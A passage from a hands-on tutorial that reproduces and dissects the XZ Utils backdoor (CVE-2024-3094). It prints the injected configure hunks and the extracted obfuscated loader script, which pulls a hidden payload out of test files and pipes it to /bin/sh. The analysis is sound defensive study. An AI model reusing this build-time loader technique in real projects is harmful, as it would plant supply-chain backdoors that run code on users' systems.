bootstrap:          'export HELP2MAN=/path/to/help2man'.
bootstrap:   error: Prerequisite 'makeinfo' not found. Please install it, or
bootstrap:          'export MAKEINFO=/path/to/makeinfo'.

To install the help2man prerequisite, we can run the following command to search the APT software package management system:

apt search help2man

which reveals that there's a package that can be installed:

Sorting... Done
Full Text Search... Done
help2man/jammy 1.49.1 amd64
  Automatic manpage generator

However this isn't the case for the makeinfo prerequisite:

root@cve-2024-3094:/project/libtool-git# apt search makeinfo
Sorting... Done
Full Text Search... Done
root@cve-2024-3094:/project/libtool-git#

Fortunately, we can locate which package provides this prerequisite by using the apt-file utility. First, install the utility by running the following command as root:

apt install apt-file

then run the following command as root to fetch the metadata required for apt-file's operation:

apt-file update

We can then query the packages that provide the makeinfo utility by running the following command:

apt_file_search_opts=(
    # Specify that the search pattern is a regular expression instead
    # of a glob pattern
    --regexp
)
apt-file search "${apt_file_search_opts[@]}"  '/s?bin/makeinfo$'

According to the following apt-file command output, we can confirm that the texinfo package provides the makeinfo command:

texinfo: /usr/bin/makeinfo

Note:

We can also use the Ubuntu Packages Search website to query the package that provides a specific file.

We can now run the following command as root to install all the missing packages:

libtool_bootstrap_prerequisite_pkgs=(
    help2man
    texinfo
)
apt install "${libtool_bootstrap_prerequisite_pkgs[@]}"

We can now retry the source build bootstrapping program by running the following command:

test -f configure || ./bootstrap

If you see the following output then the bootstrapping process has completed successfully:

bootstrap: Done.  Now you can run './configure'.

Note:

If you're in a networking environment where Internet access is only available via an HTTP proxy, the source build bootstrapping program will print the following error:

Cloning into 'gnulib'...
fatal: unable to look up git.savannah.gnu.org (port 9418) (Temporary failure in name resolution)

You can run the following command to patch the gnulib submodule's repository address to work around the problem:

current_timestamp="$(date +%Y%m%d-%H%M%S)"
sed_opts=(
    # Modify the input file in-place, while saving a backup file with
    # the current timestamp while doing so
    --in-place=".orig.${current_timestamp}"
)
sed \
    "${sed_opts[@]}" \
    's@git://git.savannah.gnu.org/gnulib.git@https://git.savannah.gnu.org/git/gnulib.git@g' \
    .gitmodules

Then we can iteratively run the build configuration program to satisfy the build requirements and finally generate the Makefile to actually build and install the software. Run the following command to do so:

./configure

First of all, the build configuration program complains about a missing C compiler:

configure: error: no acceptable C compiler found in $PATH

which can be fixed by installing a compatible C compiler like GCC; install it by running the following command as root:

apt install gcc

We can now retry the build configuration program by running the following command:

./configure

This time the build configuration should complete without errors:


    ...stripped...

config.status: executing tests/atconfig commands
config.status: executing depfiles commands
config.status: executing libtool commands
root@cve-2024-3094:/project/libtool-git# echo "${?}"
0
root@cve-2024-3094:/project/libtool-git# 

Now we can start building the GNU Libtool software by running the following commands:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the same
    # time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

If the command's exit status code is zero, the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Libtool software to the system:

make install

After the installation of the GNU Libtool software you should have the libtool command in your command search PATHs (/usr/local/bin). You may check the version of the installation by running the following command:

libtool --version

Let's run the following command to switch the working directory back to the initial one, as we have no more business with the GNU Libtool source tree:

cd /project

GNU Gettext

The installation of the 0.22.4 version of the GNU Gettext software can be started by locating the download URLs of the 0.22.4 version GNU Gettext release archive and its respective PGP signature file and downloading them to the working directory using your web browser.

Then, as usual, verify that the release archive we downloaded was actually made by one of the GNU Gettext project maintainers. We can determine who actually signed the release archive by running the following commands:

gpg_opts=(
    # Verify the authenticity of the gettext-0.22.4.tar.lz file using
    # the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
    # signer's PGP public key in your keyring which does not exist at
    # the moment)
    --verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"

You should see the following error message from GnuPG:

gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg:                using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Can't check signature: No public key

The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring; we can retrieve the public key using the key's fingerprint from the previous output by running the following commands:

gpg_opts=(
    # Specify the keyserver to fetch the public key from.
    # 
    # GnuPG does have one set by Debian (hkps://keys.openpgp.org);
    # however, it didn't work reliably during the writing of this
    # tutorial, thus another popular one is used instead.
    --keyserver keyserver.ubuntu.com
    
    # Import the keys with the given keyIDs from a keyserver
    --receive-keys 0x9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
)
gpg "${gpg_opts[@]}"

It should have the following output:

gpg: key F5BE8B267C6A406D: public key "Bruno Haible (Open Source Development) <bruno@clisp.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1

Note:

If you still can't retrieve the public key, the connection might have been blocked by your network's firewall; you could also try using the hkp://keyserver.ubuntu.com:80 keyserver, which should get through such a hostile networking environment.

As shown by the GNU Gettext project group member list page, Bruno Haible <bruno@clisp.org> is indeed one of the GNU Gettext project maintainers, so the public key we've fetched here is probably legit:

Screenshot of the "Active members on duty" section of the GNU Gettext project group member list page, group administrator Bruno Haible can be found in the list

We can now proceed to verify the 0.22.4 version of the GNU Gettext release archive:

gpg_opts=(
    # Verify the authenticity of the gettext-0.22.4.tar.lz file using
    # the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
    # signer's PGP public key in your keyring)
    --verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"

Note:

As mentioned in the Verify the authenticity of the tainted XZ Utils release archive section, the following output line indicates that the PGP-signed file is verified successfully:

gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]

Before we extract the 0.22.4 version of the GNU Gettext release archive, we need to install the software required to extract lzip-compressed tar archive files (as indicated by the .lz filename extension) by running the following commands as root:

lzip_decompress_dependency_pkgs=(
    lzip
)
apt install "${lzip_decompress_dependency_pkgs[@]}"

We can now proceed to extract the 0.22.4 version of the GNU Gettext release archive, run the following commands to do so:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file gettext-0.22.4.tar.lz
)
tar "${tar_opts[@]}"

Now we can try building the 0.22.4 version of the GNU Gettext software from source. According to the installation document (gettext-0.22.4/INSTALL), the build procedure is similar to the other GNU build system components, though the build configuration program is already shipped in the release archive so we can directly use it to configure our build.

As the build configuration program (gettext-0.22.4/configure) creates build files in your working directory, let's switch the working directory into the GNU Gettext 0.22.4 source tree to avoid writing files outside of it:

cd gettext-0.22.4

Then we can iteratively run the build configuration program to satisfy the build requirements and finally generate the Makefile to actually build and install the software. Run the following command to do so:

./configure

If the command's exit status code is zero, the build configuration is successful. Run the following command right after the ./configure command's invocation to verify it:

echo "${?}"

Now we can start building the GNU Gettext software by running the following command:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the
    # same time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

If the command's exit status code is zero, the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Gettext software to the system:

make install

After the installation of the GNU Gettext software you should have the gettext command in your command search PATHs (/usr/local/bin). You may check the version of the installation by running the following command:

gettext --version

Let's turn our heads back to the initial working directory, as we no longer have business with the GNU Gettext source tree:

cd /project

Generate the build system files

Now that the software dependencies are installed, let's generate the build system files as the project maintainers would.

As the XZ Utils autogen.sh program requires the working directory to be set to the checked-out source directory, and to avoid polluting XZ Utils build artifacts outside of its directory, run the following command to make the working directory switch:

cd xz-git

and run the following command to build the build system files:

./autogen.sh

which will error out with the following message:

po4a/update-po: The program 'po4a' was not found.
po4a/update-po: Translated man pages were not generated.

We can search for packages that provide the po4a program by using the aforementioned apt-file utility, running the following commands:

apt_file_search_opts=(
    # Specify that the search pattern is a regular expression instead
    # of a glob pattern
    --regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/po4a$'

which should produce the following output, indicating that there's a same-named package that provides the program:

po4a: /usr/bin/po4a

We can satisfy the dependency by running the following command as root:

apt install po4a

The next iteration of the ./autogen.sh command prints the following error message:

doxygen/update-doxygen: 'doxygen' command not found.
doxygen/update-doxygen: Skipping Doxygen docs generation.

for which we can again use the apt-file utility to locate the package that provides the program. We leave this step to you, and simply install the resulting dependency package by running the following command as root:

apt install doxygen

This time the ./autogen.sh command invocation should produce the following output, indicating that it has successfully generated all the files:

Stripping JavaScript from Doxygen output...
+ cd ..
+ exit 0

Let's return to the initial working directory, as the further operations don't need the current one, by running the following command:

cd /project

Comparing the difference between the clean source tree and the tainted release archive

According to the oss-security mailing list discussion thread, it is the build system files that are not in the upstream Git repository that were modified to contain the logic to extract the malicious object code file from the test data.

For ease of comparing differences, let's install a helper utility that supports plaintext data syntax highlighting: bat, "A cat(1) clone with wings". We can install it by running the following command as root:

apt install bat

Note:

Due to a command name conflict, the bat command shipped in older versions of Debian and its derivatives is renamed to batcat. To increase interoperability with other GNU/Linux distributions, let's rename it back to the upstream name by running the following commands as root:

dpkg_divert_opts=(
    # Rename the file to /usr/bin/bat
    --divert /usr/bin/bat
    
    # Do the actual rename operation, as the package is already
    # installed
    --rename
    
    # Add a new diversion for the package installed
    # /usr/bin/batcat file
    --add /usr/bin/batcat
)
dpkg-divert "${dpkg_divert_opts[@]}"
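
As an optional check (a suggestion), you can list the diversion that was just added:

# Show the diversion entry for the batcat file, if any
dpkg-divert --list '/usr/bin/batcat'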

We can generate the content differences between the 5.6.1 version checked out from the Git repository and the potentially evil-actor-prepared 5.6.1 version source tree and save them to a file by running the following commands:

diff_opts=(
    # Use the unified diff format
    --unified
    
    # Exclude files that we aren't interested in:
    # Software documentation
    --exclude='ChangeLog'
    --exclude='doc'
    
    # Translation files
    --exclude='*.po'
    --exclude='*.pot'
    --exclude='*.gmo'
    --exclude='po4a'
    
    # Git repository
    --exclude='.git'

    # Compare recursively between two directory trees
    --recursive
)
# Generate the unified diff of the git versus released XZ Utils 5.6.1
# source tree, and redirect the output to the 
# xz-vanilla-vs-tainted.diff diff file
diff "${diff_opts[@]}" xz-git xz-5.6.1 >xz-vanilla-vs-tainted.diff

Here's the reference result.

Note:

The >_file_ part of the diff command is the output redirection syntax of the Bash scripting language, which saves the content written to the command's standard output to the specified file.

By using this feature we can avoid piping the output directly into the bat utility, which in that case wouldn't be able to apply syntax highlighting unless we explicitly specified what --language the input data is in.
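
If you do want to pipe the output directly instead, the note above implies explicitly naming the input language, for example:

# Pipe the diff straight into bat, telling it the input is diff-formatted
diff "${diff_opts[@]}" xz-git xz-5.6.1 | bat --language diff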

Then we can run the following command to inspect the content differences:

bat xz-vanilla-vs-tainted.diff

You should be able to see the following output:

Content difference inspection using the less pager utility

Note:

By default the bat utility will launch the less pager for data that exceeds one terminal screen, so the keybindings supported by the less pager can be used, including but not limited to the following:

  • Press the q key to exit the pager program.
  • Press the g key to jump to the first line of the file.
  • Press the G key to jump to the last line of the file.
    • Key in the number of the line to jump to, then press the G key to jump to that specific line (due to the additional formatting introduced by bat, it may not be the exact line you intend to jump to).
  • Press the Down arrow / j key to move down a line.
  • Press the Up arrow / k key to move up a line.
  • Press the Page Up (PgUp) key to move up a page.
  • Press the Page Down (PgDn) key to move down a page.

Extract the injected object file from the test file

From the content differences we can notice that the tainted XZ Utils 5.6.1 release source tree has its build configuration program and the m4/build-to-host.m4 M4 macro file modified to contain suspicious logic, where the former is generated from the latter by GNU Autoconf.

Unfortunately, we aren't experts in reading M4 macros, so we shall temporarily put them aside and only analyse the resulting build configuration program, as it is in a much more readable Bourne-shell-compatible shell script format. Let's analyse the build configuration script in a top-down manner.

Note: About the unified diff format:

  • The lines starting with --- indicate the file before the modification.
  • The lines starting with +++ indicate the file after the modification.
  • The lines starting with @@ mark the start of a hunk (and the end of the previous hunk, if one exists).
    • The integer pairs in the hunk marker lines indicate the beginning line number and line count of the hunk in each file, where the pair prefixed with a hyphen-minus character (-) refers to the file before modification and the pair prefixed with a plus character (+) refers to the file after modification.
  • The hunk lines starting with a space character ( ) indicate lines that are unchanged by the modification.
  • The hunk lines starting with a plus character (+) indicate lines that are inserted by the modification.
  • The hunk lines starting with a hyphen-minus character (-) indicate lines that are removed by the modification.

Take the following diff hunk as an example:

--- xz-git/build-aux/config.sub 2024-04-11 22:31:56.587698017 +0800
+++ xz-5.6.1/build-aux/config.sub   2024-03-09 16:16:40.000000000 +0800
@@ -1748,7 +1753,8 @@
         | skyos* | haiku* | rdos* | toppers* | drops* | es* \
         | onefs* | tirtos* | phoenix* | fuchsia* | redox* | bme* \
         | midnightbsd* | amdhsa* | unleashed* | emscripten* | wasi* \
-        | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr*)
+        | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr* \
+        | fiwix* )
        ;;
    # This one is extra strict with allowed versions
    sco3.2v2 | sco3.2v[4-9]* | sco5v6*)

This diff hunk features lines 1748 to 1754 of the xz-git/build-aux/config.sub file(7 lines in total, including line 1751, which is removed by the modification), corresponding to lines 1753 to 1760 of the xz-5.6.1/build-aux/config.sub file(8 lines in total, including lines 1756 and 1757, which are inserted by the modification).

Refer to the Detailed Description of Unified Format | GNU Diffutils manual for more information.

Note:

In case you need another terminal window to read the full file, you can get another container shell by running the following command as root in a separate terminal window:

docker_exec_opts=(
    # Allow bash interactive mode to properly function
    --interactive
    --tty
)
bash_opts=(
    # Launch a login shell that reads the user's configuration files
    --login
)
docker exec "${docker_exec_opts[@]}" cve-2024-3094 \
    bash "${bash_opts[@]}"

Let's examine the next hunk of the build configuration program:

@@ -18683,8 +18683,16 @@
 
 
 
+      gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
   gl_sed_escape_for_make_2='s,\$,\\$$,g'
       case `echo r | tr -d '\r'` in

Line 18686 assigns the gl_am_configmake variable with the standard output of the following command:

grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null

Note:

The `command` portion of the command is in the aforementioned Bash scripting language's command substitution syntax, in its legacy backquote form that is equivalent to $(command).

We can expand the command as the following commands:

# Seems to be expanded to the source tree directory's path
srcdir=xz-5.6.1
grep_opts=(
    # -a: Process a binary file as if it were text
    --text
    
    # -E: Specify the search pattern is an extended regular
    # expression(ERE)
    --extended-regexp
    
    # -r: Read and process all files in the specified directory
    # recursively
    --recursive
    
    # -l: Suppress normal output, only print the name of the input
    # file that have successfully matched the specified search
    # pattern
    --files-with-matches
    
    # -s: Suppress error messages regarding nonexistent or unreadable
    # files
    --no-messages
)
grep "${grep_opts[@]}" "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null

The #{4}[[:alnum:]]{5}#{4} (POSIX) extended regular expression matches any string that has the following elements in the following order(a quick sanity check follows the list):

  1. 4 consecutive pound signs(#{4})
  2. 5 consecutive characters that is in the set of alphabet letters and numbers([[:alnum:]]{5})
  3. 4 consecutive pound signs(#{4})
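For instance(####Hello#### happens to be the exact magic string embedded in the malicious test file, as we'll see shortly):

# Matches: exactly 5 alphanumeric characters enclosed by two groups
# of 4 pound signs at the end of the line
printf '####Hello####\n' | grep --extended-regexp '#{4}[[:alnum:]]{5}#{4}$'

# Doesn't match(only 4 alphanumeric characters): grep exits with a
# non-zero status and the fallback command prints "no match"
printf '####Hell####\n' | grep --extended-regexp '#{4}[[:alnum:]]{5}#{4}$' \
    || echo 'no match'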

Running the command will reveal the assigned variable value to be:

xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz

This is already alarming, as a software testing data file shouldn't have any business with the software build process itself.

The if block at lines 18687~18691 checks whether the gl_am_configmake variable is a non-null string(i.e. whether the grep command matched the special search pattern somewhere in the software source tree) and assigns the HAVE_PKG_CONFIGMAKE variable to 1 when it is. This is likely to avoid the build configuration program erroring out when the maliciously crafted test data does not exist in the source tree for any reason(like the file being removed at a future time), which might attract people's attention.

Note:

People who are familiar with the build configuration programs generated by GNU Autoconf may notice that the if condition uses a test feature (-n) that is not normally used in a build configuration program due to shell compatibility concerns(we will see the proper way to do so in the following sections). This increases the suspiciousness of the change.

Line 18695 assigns the tr "\t \-_" " \t_\-" string to the gl_path_map variable, which is seemingly a camouflaged tr command that translates data using the following rules(a quick demonstration follows the list):

  • Replace the tab character(\t) with a space character.
  • Replace the space character( ) with a tab character.
  • Replace the hyphen-minus character(\-) with an underscore character.
  • Replace the underscore character with a hyphen-minus character.
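The sample string in the following demonstration is arbitrary:

# Swaps the underscore/hyphen-minus characters and the space/tab
# characters; prints "-foo<TAB>bar_"
printf '_foo bar-\n' | tr "\t \-_" " \t_\-"

As we'll see, applying this translation to the content of the bad-3-corrupt_lzma2.xz test file is exactly what repairs the "corrupt" file into a valid xz archive.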

Then, for the following difference hunk:

@@ -19875,6 +19883,7 @@
 
 
     gl_final_localedir="$localedir"
+  gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
     case "$build_os" in
     cygwin*)
       case "$host_os" in

The wrongly indented line 19886:

gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`

assigns the gl_localedir_prefix variable to the output of the following command:

echo $gl_am_configmake | sed "s/.*\.//g"

, which, after the parameter expansion and quote removal, becomes:

echo xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g"

This command essentially calls the sed plaintext data manipulation utility to do a search & replace:

  • Search for all occurrences that match the .*\. basic regular expression.
    • The .* basic regular expression pattern matches zero or more occurrences of the . RE pattern(which matches any single character).
    • The \. basic regular expression pattern matches a literal . character.
  • Replace the matched occurrences with a null string(essentially removing them).

, which extracts the xz filename extension from the xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz filename; as you will notice in a later section, this is a sneaky way to conjure up the xz command call.
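Running the expanded command confirms the result:

# Prints "xz": the greedy .* pattern matches everything up to and
# including the last . character, which is then removed
echo xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g"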

Note:

The \. substring in the "s/.*\.//g" double-quoted string expands to literal \. instead of . due to the following behaviors documented in the Bash reference manual:

  • The backslash retains its special meaning only when followed by one of the following characters: ‘$’, ‘`’, ‘"’, ‘\’, or newline.
  • Within double quotes, backslashes that are followed by one of these characters are removed. Backslashes preceding characters without a special meaning are left unmodified.

Let's examine the next hunk of the build configuration program, which strangely features a big chunk of blank lines:

@@ -19891,6 +19900,34 @@
       if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
     localedir_c_make='\"$(localedir)\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'
+  else
+    gl_localedir_config=''
+  fi

    ...stripped...
    
+          ac_config_commands="$ac_config_commands build-to-host"
 
 
   localedir="${gt_save_localedir}"

The if block at lines 19903~19907 checks whether the gl_am_configmake variable's value is not a null string(essentially the same check as the -n option of the test command used in the aforementioned hunk).

Note:

This is what a GNU Autoconf-generated build configuration program would normally do in order to check whether a string is not null, as opposed to using the -n command-line option of the test builtin command mentioned previously.
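Here is a minimal sketch contrasting the two equivalent checks, where the variable value is deliberately chosen to look like a test operator(the corner case that the portable x-prefix form guards against in ancient shells):

var='-n'

# The portable idiom normally emitted by GNU Autoconf
if test "x$var" != "x"; then
    echo 'not null(portable form)'
fi

# The equivalent form that the injected code uses instead
if test -n "$var"; then
    echo 'not null(-n form)'
fi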

When the variable's value is not a null string, it sets the gl_localedir_config variable to the following single-quoted string:

sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null

We'll keep this string unprocessed for now until it is actually evaluated by the shell interpreter.

Line 19930 appends the build-to-host string to the ac_config_commands variable, which seems to define a GNU Autoconf build configuration command that will be run at the end of the build configuration. I'm not entirely sure what effect it creates, so let's just leave this one alone for the moment.

For the next diff hunk:

@@ -23884,6 +23921,11 @@
 enable_dlopen_self_static='`$ECHO "$enable_dlopen_self_static" | $SED "$delay_single_quote_subst"`'
 old_striplib='`$ECHO "$old_striplib" | $SED "$delay_single_quote_subst"`'
 striplib='`$ECHO "$striplib" | $SED "$delay_single_quote_subst"`'
+gl_path_map='`$ECHO "$gl_path_map" | $SED "$delay_single_quote_subst"`'
+gl_localedir_prefix='`$ECHO "$gl_localedir_prefix" | $SED "$delay_single_quote_subst"`'
+gl_am_configmake='`$ECHO "$gl_am_configmake" | $SED "$delay_single_quote_subst"`'
+localedir_c_make='`$ECHO "$localedir_c_make" | $SED "$delay_single_quote_subst"`'
+gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`'
 LD_RC='`$ECHO "$LD_RC" | $SED "$delay_single_quote_subst"`'
 reload_flag_RC='`$ECHO "$reload_flag_RC" | $SED "$delay_single_quote_subst"`'
 reload_cmds_RC='`$ECHO "$reload_cmds_RC" | $SED "$delay_single_quote_subst"`'

Lines 23924~23928 do some sort of translation to the content of the previously defined variables, using a sed expression that is defined at lines 8403~8404 as the following:

# Sed substitution to delay expansion of an escaped single quote.
delay_single_quote_subst='s/'\''/'\'\\\\\\\'\''/g'

After the script interpreter's escape character interpretation and quote removal the actual sed expression can be determined to be:

s/'/'\\\''/g

According to the s command section of the GNU sed manual, only the \\ substring in the replacement portion of the s sed command is treated as an escape sequence and is interpreted as a single backslash character(\). As a result the sed expression will search for every occurrence of the single-quote character in each input line and replace it with '\\''.

This operation seems to be GNU Autoconf working around shell interpreter behaviors and is not related to the backdoor itself; we'll ignore it for now.

Recall the gl_localedir_config variable assigned at line 19904; its value, in effect, is a shell command pipeline that can be further expanded to:

sed \"r\n\" xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz \
    | tr "\t \-_" " \t_\-" \
    | xz -d 2>/dev/null

I wasn't able to figure out what the weird sed command does, so I simply looked it up. According to Daniel Feldman, the sed command is essentially a disguised cat that simply outputs the content of the bad-3-corrupt_lzma2.xz file to the rest of the pipeline, which does the aforementioned character translation and decompresses the result using the xz utility.
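We can verify the disguised-cat behavior ourselves: the r sed command queues the content of the named file(here the bogus \n) for output, and silently does nothing when that file cannot be read, so sed merely copies its input file to the standard output device:

# Prints the demo file's content unmodified, just like cat would
printf 'hello\nworld\n' >sed-r-demo.txt
sed "r\n" sed-r-demo.txt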

What does it extract to? A shell script!

####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

Let's ignore the multiple attempts to terminate the script when the operating system isn't Linux. In the next portion of the commands:

if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi

the script attempts to locate the root directory of the XZ Utils source tree via the srcdir variable set in the config.status GNU Autoconf build intermediate file, as the build configuration program may not be run in the root directory of the source tree in some software build scenarios(like distribution packaging).
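Here is a minimal sketch of this lookup using a mock config.status file(the file content below is hypothetical and only mirrors the srcdir assignment line that GNU Autoconf writes):

# Simulate the GNU Autoconf build intermediate file
printf "srcdir='../xz-5.6.1'\n" >config.status

# Extract and evaluate the srcdir assignment line, like the malicious
# script does
eval `grep ^srcdir= config.status`

# Prints "../xz-5.6.1"
echo "${srcdir}"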

In the last portion of the script, the following commands are executed:

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)"
(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
    | eval $i \
    | tail -c +31233 \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    | /bin/sh

Smells like another round of code/data obfuscation; let's divide and conquer the command pipeline.

In the first component of the command pipeline:

srcdir="xz-git"
xz_opts=(
    # Decompress compressed data
    --decompress
    
    # Output decompressed data to the standard output
    # device
    --stdout
)
xz "${xz_opts[@]}" "${srcdir}/tests/files/good-large_compressed.lzma"

the script decompresses the seemingly benign tests/files/good-large_compressed.lzma test data to the command's output.

The i shell variable essentially houses a subshell of AND-list commands to run; after parameter expansion the pipeline becomes:

(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
        | eval "((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)" \
        | tail -c +31233 \
        | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    | /bin/sh

The eval command interprets the following string as a script. It doesn't seem to matter much on this occasion, so let's drop it for now:

(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
    | (
        (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +939
    ) \
    | tail -c +31233 \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    | /bin/sh

As the name indicates, the subshell syntax launches another shell interpreter process as the current shell interpreter's sub-process, and runs the enclosed commands inside that process. The shell interpreter will receive the output from the previous component of the command pipeline, process it using the commands in the subshell, then output the result to the standard output device(stdout), which is then redirected as the standard input(stdin) data of the next component in the pipeline.

The subshell commands simply (a loop-form sketch follows the list):

  1. Drop(>/dev/null) 1,024 bytes from the start of the data stream.
  2. Output the next 2,048 bytes of the data stream.
  3. Repeat steps 1. and 2. until they have run 16 times in total.
  4. Drop(>/dev/null) another 1,024 bytes of the data stream.
  5. Output the next 939 bytes of the data stream.
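In other words the chain extracts 16 × 2,048 + 939 = 33,707 bytes of interleaved data. The following loop-form sketch is equivalent to the head chain(the input is arbitrary random data, merely to verify the arithmetic):

# Extract the 16 interleaved 2,048-byte chunks plus the final
# 939-byte chunk, dropping 1,024 bytes before each one
extract_chunks(){
    for _ in $(seq 16); do
        head -c 1024 >/dev/null
        head -c 2048
    done
    head -c 1024 >/dev/null
    head -c 939
}

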